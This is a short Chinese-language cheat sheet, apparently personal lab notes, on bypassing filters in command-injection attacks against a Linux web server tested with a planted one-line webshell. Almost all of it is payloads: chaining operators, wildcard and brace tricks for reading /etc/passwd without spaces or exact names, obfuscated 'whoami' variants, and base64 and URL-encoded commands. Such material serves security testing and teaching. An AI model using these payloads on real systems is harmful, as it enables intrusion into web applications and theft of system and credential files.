部署服務(wù)器端為Linux系統(tǒng)的http服務(wù)，留存get和post方式的一句話木馬，用于命令執(zhí)行測(cè)試。（測(cè)試思路可以對(duì)話Chatgpt）

linux邏輯運(yùn)算符

; //分號(hào)

| //僅執(zhí)行后面那條命令

|| //僅執(zhí)行前面那條命令

& //兩條命令都會(huì)執(zhí)行

%0a //換行符 %0d //回車符

利用通配符

通配符"?"代表任意一個(gè)字符，"*"代表任意個(gè)字符

cat%20/etc/pa??wd

cat%20/etc/pa?*wd

嘗試

cat /*****et*c*/*pas**************************************************swd

結(jié)合上述方式進(jìn)行組合bypass

echo mt ; whoami

使用大括號(hào)來(lái)繞過(guò)空格的限制

{cat,/etc/passwd}

{ls,-alth}

命令混淆

whoami
wh$1oami
who$@ami
whoa$*mi

命令變形

/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i

base64編碼方式進(jìn)行

echo id|base64
echo id|base64

URL編碼

%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b